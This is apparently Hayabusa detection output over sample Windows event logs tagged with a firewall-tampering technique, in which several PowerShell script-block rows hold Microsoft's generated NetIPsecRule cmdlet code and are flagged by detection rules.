Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule 
activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] 
[Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper 
-is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 